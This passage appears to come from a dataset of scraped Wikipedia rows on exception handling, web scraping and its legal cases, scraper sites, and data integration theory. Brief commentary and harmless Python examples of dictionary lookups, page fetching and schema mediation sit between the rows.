C, routines would need to signal the error in some other way, such as the common return code and errno pattern. 11 Taking a broad view, errors can be considered to be a proper subset of exceptions, 12 and explicit error mechanisms such as errno can be considered (verbose) forms of exception handling. 11 The term "exception" is preferred to "error" because it does not imply that anything is wrong: a condition viewed as an error by one procedure or programmer may not be viewed that way by another. 13 The term "exception" may be misleading because its connotation of "anomaly" indicates that raising an exception is abnormal or unusual, 14 when in fact raising the exception may be a normal and usual situation in the program. 13 For example, suppose a lookup function for an associative array throws an exception if the key has no value associated. Depending on context, this "key absent" exception may occur much more often than a successful lookup. 
15 The first hardware exception handling was found in the UNIVAC I from 1951. Arithmetic overflow executed two instructions at address 0 which could transfer control or fix up the result. 16 Software exception handling developed in the 1960s and 1970s. Exception handling was subsequently widely adopted by many programming languages from the 1980s onward. There is no clear consensus as to the exact meaning of an exception with respect to hardware. 17 From the implementation point of view, it is handled identically to an interrupt: the processor halts execution of the current program, looks up the interrupt handler in the interrupt vector table for that exception or interrupt condition, saves state, and switches control. Exception handling in the IEEE 754 floating-point standard refers in general to exceptional conditions and defines an exception as "an event that occurs when an operation on some particular operands has no outcome suitable for every reasonable application. That operation might signal one or more exceptions by invoking the default or, if explicitly requested, a language-defined alternate handling." By default, an IEEE 754 exception is resumable and is handled by substituting a predefined value for different exceptions, e.g. infinity for a divide by zero exception, and providing status flags for later checking of whether the exception occurred (see C99 programming language for a typical example of handling of IEEE 754 exceptions). An exception-handling style enabled by the use of status flags involves: first computing an expression using a fast, direct implementation; checking whether it failed by testing status flags; and then, if necessary, calling a slower, more numerically robust, implementation. 18 The IEEE 754 standard uses the term "trapping" to refer to the calling of a user-supplied exception-handling routine on exceptional conditions, and is an optional feature of the standard. The standard recommends several usage scenarios for this, including the implementation of non-default pre-substitution of a value followed by resumption, to concisely handle removable singularities. 18 19 20 The default IEEE 754 exception handling behaviour of resumption following pre-substitution of a default value avoids the risks inherent in changing flow of program control on numerical exceptions. For example, the 1996 Cluster spacecraft launch ended in a catastrophic explosion due in part to the Ada exception handling policy of aborting computation on arithmetic error. William Kahan claims the default IEEE 754 exception handling behavior would have prevented this. 19 Front-end web development frameworks, such as React and Vue, have introduced error handling mechanisms where errors propagate up the user interface (UI) component hierarchy, in a way that is analogous to how errors propagate up the call stack in executing code. 21 22 Here the error boundary mechanism serves as an analogue to the typical try-catch mechanism. Thus a component can ensure that errors from its child components are caught and handled, and not propagated up to parent components. For example, in Vue, a component can catch errors by implementing the errorCaptured hook; when such a component is used in markup, an error produced by a child component is caught and handled by the parent component. 23 |
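The entry above describes exception handling as a solution to the semipredicate problem (distinguishing normal return values from error signals) and uses a "key absent" lookup on an associative array as its example. The short Python sketch below contrasts the two styles; the dictionary contents and key names are made up for illustration.

# Sentinel style: a special return value stands in for "not found", which is
# ambiguous whenever None could also be a legitimately stored value.
prices = {"AAL": 12.5, "LUV": 27.1}

value = prices.get("QVCA")          # returns None when the key is absent
if value is None:
    print("sentinel: key absent")

# Exception style: the "key absent" condition breaks the normal flow and is
# handled by a pre-registered handler (the except block).
try:
    value = prices["QVCA"]          # raises KeyError when the key is absent
except KeyError as exc:
    print(f"exception: {exc!r} handled by the except block")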
531 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-11 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting data from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a common URL scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as XPath can be used to parse the resulting DOM tree. There are several companies that have developed vertical-specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical, and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually the number of fields) and its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may include metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Another approach uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include the following. BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 Until the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit to reconsider in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 The Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
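The entry above surveys the basic extraction techniques this notebook relies on: fetching pages over HTTP, matching text with regular expressions, and parsing HTML into a DOM-like tree. The sketch below combines requests, re, and BeautifulSoup, consistent with the libraries imported at the top of the notebook; the URL, the h2 tag choice, and the price pattern are placeholders for illustration only.

import re
import requests
from bs4 import BeautifulSoup

URL = "https://example.com/listings"  # placeholder target; replace as needed

def fetch_and_extract(url):
    # Fetching: download the page much as a browser would.
    response = requests.get(url, timeout=10)
    response.raise_for_status()

    # Extraction via DOM parsing: parse the HTML and walk the tree.
    soup = BeautifulSoup(response.text, "html5lib")
    headings = [h.get_text(strip=True) for h in soup.find_all("h2")]

    # Extraction via regular expressions: pull simple patterns such as prices.
    prices = re.findall(r"\$\d[\d,]*(?:\.\d{2})?", response.text)

    return headings, prices

try:
    headings, prices = fetch_and_extract(URL)
    print(headings[:5], prices[:5])
except requests.RequestException as e:
    print(f"Request failed: {e}")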
532 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Scraper_site | A scraper site is a website that copies content from other websites using web scraping. The content is then mirrored with the goal of creating revenue, usually through advertising and sometimes by selling user data. Scraper sites come in various forms: Some provide little if any material or information and are intended to obtain user information such as e-mail addresses to be targeted for spam e-mail. Price aggregation and shopping sites access multiple listings of a product and allow a user to rapidly compare the prices. Search engines such as Google could be considered a type of scraper site. Search engines gather content from other websites, save it in their own databases, index it and present the scraped content to the search engines' own users. The majority of content scraped by search engines is copyrighted. 1 The scraping technique has been used on various dating websites as well. These sites often combine their scraping activities with facial recognition. 2 3 4 5 6 7 8 9 10 11 Scraping is also used on general image analysis (recognition) websites, as well as websites specifically made to identify images of crops with pests and diseases. 12 13 Some scraper sites are created to make money by using advertising programs. In such cases, they are called Made for AdSense sites or MFA. This derogatory term refers to websites that have no redeeming value except to lure visitors to the website for the sole purpose of clicking on advertisements. 14 Made for AdSense sites are considered search engine spam that dilutes the search results with less-than-satisfactory search results. The scraped content is redundant compared to the content that would be shown by the search engine under normal circumstances, had no MFA website been found in the listings. Some scraper sites link to other sites in order to improve their search engine ranking through a private blog network. Prior to Google's update to its search algorithm known as Panda, a type of scraper site known as an auto blog was quite common among black-hat marketers who used a method known as spamdexing. Scraper sites may violate copyright law. Even taking content from an open content site can be a copyright violation, if done in a way which does not respect the license. For instance, the GNU Free Documentation License (GFDL) 15 and Creative Commons ShareAlike (CC-BY-SA) 16 licenses used on Wikipedia 17 require that a republisher of Wikipedia inform its readers of the conditions on these licenses, and give credit to the original author. Depending upon the objective of a scraper, the methods in which websites are targeted differ. For example, sites with large amounts of content such as airlines, consumer electronics, department stores, etc. might be routinely targeted by their competition just to stay abreast of pricing information. Another type of scraper will pull snippets and text from websites that rank high for keywords they have targeted. This way they hope to rank highly in the search engine results pages (SERPs), piggybacking on the original page's page rank. RSS feeds are vulnerable to scrapers. Other scraper sites consist of advertisements and paragraphs of words randomly selected from a dictionary. Often a visitor will click on a pay-per-click advertisement on such a site because it is the only comprehensible text on the page. Operators of these scraper sites gain financially from these clicks. 
Advertising networks claim to be constantly working to remove these sites from their programs, although these networks benefit directly from the clicks generated at this kind of site. From the advertisers' point of view, the networks don't seem to be making enough effort to stop this problem. Scrapers tend to be associated with link farms and are sometimes perceived as the same thing, when multiple scrapers link to the same target site. A frequent target victim site might be accused of link-farm participation, due to the artificial pattern of incoming links to a victim website, linked from multiple scraper sites. Some programmers who create scraper sites may purchase a recently expired domain name to reuse its SEO power in Google. Whole businesses that focus on understanding expired domains and utilising them for their historical ranking ability exist. Doing so will allow SEOs to utilize the already-established backlinks to the domain name. Some spammers may try to match the topic of the expired site or copy the existing content from the Internet Archive to maintain the authenticity of the site so that the backlinks don't drop. For example, an expired website about a photographer may be re-registered to create a site about photography tips or use the domain name in their private blog network to power their own photography site. Services at some expired domain name registration agents provide both the facility to find these expired domains and to gather the HTML that the domain name used to have on its web site. |
533 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_integration | Data integration involves combining data residing in different sources and providing users with a unified view of them. 1 This process becomes significant in a variety of situations, which include both commercial (such as when two similar companies need to merge their databases) and scientific (combining research results from different bioinformatics repositories, for example) domains. Data integration appears with increasing frequency as the volume, complexity (that is, big data) and the need to share existing data explodes. 2 It has become the focus of extensive theoretical work, and numerous open problems remain unsolved. Data integration encourages collaboration between internal as well as external users. The data being integrated must be received from a heterogeneous database system and transformed to a single coherent data store that provides synchronous data across a network of files for clients. 3 A common use of data integration is in data mining when analyzing and extracting information from existing databases that can be useful for business information. 4 Issues with combining heterogeneous data sources, often referred to as information silos, under a single query interface have existed for some time. In the early 1980s, computer scientists began designing systems for interoperability of heterogeneous databases. 5 The first data integration system driven by structured metadata was designed at the University of Minnesota in 1991, for the Integrated Public Use Microdata Series (IPUMS). IPUMS used a data warehousing approach, which extracts, transforms, and loads data from heterogeneous sources into a unique view schema so data from different sources become compatible. 6 By making thousands of population databases interoperable, IPUMS demonstrated the feasibility of large-scale data integration. The data warehouse approach offers a tightly coupled architecture because the data are already physically reconciled in a single queryable repository, so it usually takes little time to resolve queries. 7 The data warehouse approach is less feasible for data sets that are frequently updated, requiring the extract, transform, load (ETL) process to be continuously re-executed for synchronization. Difficulties also arise in constructing data warehouses when one has only a query interface to summary data sources and no access to the full data. This problem frequently emerges when integrating several commercial query services like travel or classified advertisement web applications. As of 2009, the trend in data integration favored the loose coupling of data 8 and providing a unified query-interface to access real time data over a mediated schema (see Figure 2), which allows information to be retrieved directly from original databases. This is consistent with the SOA approach popular in that era. This approach relies on mappings between the mediated schema and the schema of original sources, and translating a query into decomposed queries to match the schema of the original databases. Such mappings can be specified in two ways: as a mapping from entities in the mediated schema to entities in the original sources (the "Global-as-View" 9 (GAV) approach), or as a mapping from entities in the original sources to the mediated schema (the "Local-as-View" 10 (LAV) approach). 
The latter approach requires more sophisticated inferences to resolve a query on the mediated schema, but makes it easier to add new data sources to a (stable) mediated schema. As of 2010, some of the work in data integration research concerns the semantic integration problem. This problem addresses not the structuring of the architecture of the integration, but how to resolve semantic conflicts between heterogeneous data sources. For example, if two companies merge their databases, certain concepts and definitions in their respective schemas, like "earnings", inevitably have different meanings. In one database it may mean profits in dollars (a floating-point number), while in the other it might represent the number of sales (an integer). A common strategy for the resolution of such problems involves the use of ontologies which explicitly define schema terms and thus help to resolve semantic conflicts. This approach represents ontology-based data integration. On the other hand, the problem of combining research results from different bioinformatics repositories requires benchmarking of the similarities, computed from different data sources, on a single criterion such as positive predictive value. This enables the data sources to be directly comparable and can be integrated even when the natures of experiments are distinct. 11 As of 2011, it was determined that current data modeling methods were imparting data isolation into every data architecture in the form of islands of disparate data and information silos. This data isolation is an unintended artifact of the data modeling methodology that results in the development of disparate data models. Disparate data models, when instantiated as databases, form disparate databases. Enhanced data model methodologies have been developed to eliminate the data isolation artifact and to promote the development of integrated data models. 12 One enhanced data modeling method recasts data models by augmenting them with structural metadata in the form of standardized data entities. As a result of recasting multiple data models, the set of recast data models will now share one or more commonality relationships that relate the structural metadata now common to these data models. Commonality relationships are a peer-to-peer type of entity relationships that relate the standardized data entities of multiple data models. Multiple data models that contain the same standard data entity may participate in the same commonality relationship. When integrated data models are instantiated as databases and are properly populated from a common set of master data, then these databases are integrated. Since 2011, data hub approaches have been of greater interest than fully structured (typically relational) Enterprise Data Warehouses. Since 2013, data lake approaches have risen to the level of Data Hubs. (See all three search terms' popularity on Google Trends. 13 ) These approaches combine unstructured or varied data into one location, but do not necessarily require an (often complex) master relational schema to structure and define all data in the Hub. Data integration plays a big role in business regarding data collection used for studying the market. Converting the raw data retrieved from consumers into coherent data is something businesses try to do when considering what steps they should take next. 
14 Organizations are more frequently using data mining for collecting information and patterns from their databases, and this process helps them develop new business strategies to increase business performance and perform economic analyses more efficiently. Compiling the large amount of data they collect to be stored in their system is a form of data integration adapted for Business intelligence to improve their chances of success. 15 Consider a web application where a user can query a variety of information about cities (such as crime statistics, weather, hotels, demographics, etc.). Traditionally, the information must be stored in a single database with a single schema. But any single enterprise would find information of this breadth somewhat difficult and expensive to collect. Even if the resources exist to gather the data, it would likely duplicate data in existing crime databases, weather websites, and census data. A data-integration solution may address this problem by considering these external resources as materialized views over a virtual mediated schema, resulting in "virtual data integration". This means application-developers construct a virtual schema—the mediated schema—to best model the kinds of answers their users want. Next, they design "wrappers" or adapters for each data source, such as the crime database and weather website. These adapters simply transform the local query results (those returned by the respective websites or databases) into an easily processed form for the data integration solution (see figure 2). When an application-user queries the mediated schema, the data-integration solution transforms this query into appropriate queries over the respective data sources. Finally, the virtual database combines the results of these queries into the answer to the user's query. This solution offers the convenience of adding new sources by simply constructing an adapter or an application software blade for them. It contrasts with ETL systems or with a single database solution, which require manual integration of entire new data set into the system. The virtual ETL solutions leverage virtual mediated schema to implement data harmonization; whereby the data are copied from the designated "master" source to the defined targets, field by field. Advanced data virtualization is also built on the concept of object-oriented modeling in order to construct virtual mediated schema or virtual metadata repository, using hub and spoke architecture. Each data source is disparate and as such is not designed to support reliable joins between data sources. Therefore, data virtualization as well as data federation depends upon accidental data commonality to support combining data and information from disparate data sets. Because of the lack of data value commonality across data sources, the return set may be inaccurate, incomplete, and impossible to validate. One solution is to recast disparate databases to integrate these databases without the need for ETL. The recast databases support commonality constraints where referential integrity may be enforced between databases. The recast databases provide designed data access paths with data value commonality across databases. The theory of data integration 1 forms a subset of database theory and formalizes the underlying concepts of the problem in first-order logic. Applying the theories gives indications as to the feasibility and difficulty of data integration. 
While its definitions may appear abstract, they have sufficient generality to accommodate all manner of integration systems, 16 including those that include nested relational XML databases 17 and those that treat databases as programs. 18 Connections to particular database systems such as Oracle or DB2 are provided by implementation-level technologies such as JDBC and are not studied at the theoretical level. Data integration systems are formally defined as a tuple ⟨G, S, M⟩ where G is the global (or mediated) schema, S is the heterogeneous set of source schemas, and M is the mapping that maps queries between the source and the global schemas. Both G and S are expressed in languages over alphabets composed of symbols for each of their respective relations. The mapping M consists of assertions between queries over G and queries over S. When users pose queries over the data integration system, they pose queries over G and the mapping then asserts connections between the elements in the global schema and the source schemas. A database over a schema is defined as a set of sets, one for each relation (in a relational database). The database corresponding to the source schema S would comprise the set of sets of tuples for each of the heterogeneous data sources and is called the source database. Note that this single source database may actually represent a collection of disconnected databases. The database corresponding to the virtual mediated schema G is called the global database. The global database must satisfy the mapping M with respect to the source database. The legality of this mapping depends on the nature of the correspondence between G and S. Two popular ways to model this correspondence exist: Global as View or GAV and Local as View or LAV. GAV systems model the global database as a set of views over S. In this case M associates to each element of G a query over S. Query processing becomes a straightforward operation due to the well-defined associations between G and S. The burden of complexity falls on implementing mediator code instructing the data integration system exactly how to retrieve elements from the source databases. If any new sources join the system, considerable effort may be necessary to update the mediator, thus the GAV approach appears preferable when the sources seem unlikely to change. In a GAV approach to the example data integration system above, the system designer would first develop mediators for each of the city information sources and then design the global schema around these mediators. For example, consider if one of the sources served a weather website. The designer would likely then add a corresponding element for weather to the global schema. Then the bulk of effort concentrates on writing the proper mediator code that will transform predicates on weather into a query over the weather website. This effort can become complex if some other source also relates to weather, because the designer may need to write code to properly combine the results from the two sources. On the other hand, in LAV, the source database is modeled as a set of views over G. 
In this case M associates to each element of S a query over G. Here the exact associations between G and S are no longer well-defined. As is illustrated in the next section, the burden of determining how to retrieve elements from the sources is placed on the query processor. The benefit of an LAV modeling is that new sources can be added with far less work than in a GAV system, thus the LAV approach should be favored in cases where the mediated schema is less stable or likely to change. 1 In an LAV approach to the example data integration system above, the system designer designs the global schema first and then simply inputs the schemas of the respective city information sources. Consider again if one of the sources serves a weather website. The designer would add corresponding elements for weather to the global schema only if none existed already. Then programmers write an adapter or wrapper for the website and add a schema description of the website's results to the source schemas. The complexity of adding the new source moves from the designer to the query processor. The theory of query processing in data integration systems is commonly expressed using conjunctive queries and Datalog, a purely declarative logic programming language. 20 One can loosely think of a conjunctive query as a logical function applied to the relations of a database, such as f(A, B) where A < B. If a tuple or set of tuples is substituted into the rule and satisfies it (makes it true), then we consider that tuple as part of the set of answers in the query. While formal languages like Datalog express these queries concisely and without ambiguity, common SQL queries count as conjunctive queries as well. In terms of data integration, "query containment" represents an important property of conjunctive queries. A query A contains another query B (denoted A ⊃ B) if the results of applying B are a subset of the results of applying A for any database. The two queries are said to be equivalent if the resulting sets are equal for any database. This is important because in both GAV and LAV systems, a user poses conjunctive queries over a virtual schema represented by a set of views, or "materialized" conjunctive queries. Integration seeks to rewrite the queries represented by the views to make their results equivalent or maximally contained by our user's query. This corresponds to the problem of answering queries using views (AQUV). 21 In GAV systems, a system designer writes mediator code to define the query-rewriting. Each element in the user's query corresponds to a substitution rule just as each element in the global schema corresponds to a query over the source. Query processing simply expands the subgoals of the user's query according to the rule specified in the mediator and thus the resulting query is likely to be equivalent. While the designer does the majority of the work beforehand, some GAV systems such as Tsimmis involve simplifying the mediator description process. In LAV systems, queries undergo a more radical process of rewriting because no mediator exists to align the user's query with a simple expansion strategy. The integration system must execute a search over the space of possible queries in order to find the best rewrite. 
The resulting rewrite may not be an equivalent query but maximally contained, and the resulting tuples may be incomplete. As of 2011, the GQR algorithm 22 is the leading query rewriting algorithm for LAV data integration systems. In general, the complexity of query rewriting is NP-complete. 21 If the space of rewrites is relatively small, this does not pose a problem, even for integration systems with hundreds of sources. Large-scale questions in science, such as real world evidence, global warming, invasive species spread, and resource depletion, are increasingly requiring the collection of disparate data sets for meta-analysis. This type of data integration is especially challenging for ecological and environmental data because metadata standards are not agreed upon and there are many different data types produced in these fields. National Science Foundation initiatives such as Datanet are intended to make data integration easier for scientists by providing cyberinfrastructure and setting standards. The five funded Datanet initiatives are DataONE, 23 led by William Michener at the University of New Mexico; The Data Conservancy, 24 led by Sayeed Choudhury of Johns Hopkins University; SEAD: Sustainable Environment through Actionable Data, 25 led by Margaret Hedstrom of the University of Michigan; the DataNet Federation Consortium, 26 led by Reagan Moore of the University of North Carolina; and Terra Populus, 27 led by Steven Ruggles of the University of Minnesota. The Research Data Alliance 28 has more recently explored creating global data integration frameworks. The OpenPHACTS project, funded through the European Union Innovative Medicines Initiative, built a drug discovery platform by linking datasets from providers such as European Bioinformatics Institute, Royal Society of Chemistry, UniProt, WikiPathways and DrugBank. |
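The entries above describe virtual data integration, in which wrappers (adapters) translate queries over a mediated schema into source-specific queries and the mediator combines the partial results. The toy Python sketch below mirrors the article's city-information example in a GAV style; the sources, field names, and values are entirely hypothetical.

# Toy GAV-style mediation: each element of the global (mediated) schema is
# defined as a view over one hypothetical source wrapper.

def crime_source(city):
    # Stand-in wrapper for a crime-statistics database.
    fake_db = {"Copenhagen": {"incidents_per_1000": 42}}
    return fake_db.get(city, {})

def weather_source(city):
    # Stand-in wrapper for a weather web service.
    fake_api = {"Copenhagen": {"avg_temp_c": 9.1}}
    return fake_api.get(city, {})

MEDIATED_SCHEMA = {
    "crime_rate": lambda city: crime_source(city).get("incidents_per_1000"),
    "avg_temp_c": lambda city: weather_source(city).get("avg_temp_c"),
}

def query(city, fields):
    # Decompose a query over the mediated schema into per-source queries,
    # then combine the partial answers into a single unified result.
    return {field: MEDIATED_SCHEMA[field](city) for field in fields}

print(query("Copenhagen", ["crime_rate", "avg_temp_c"]))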
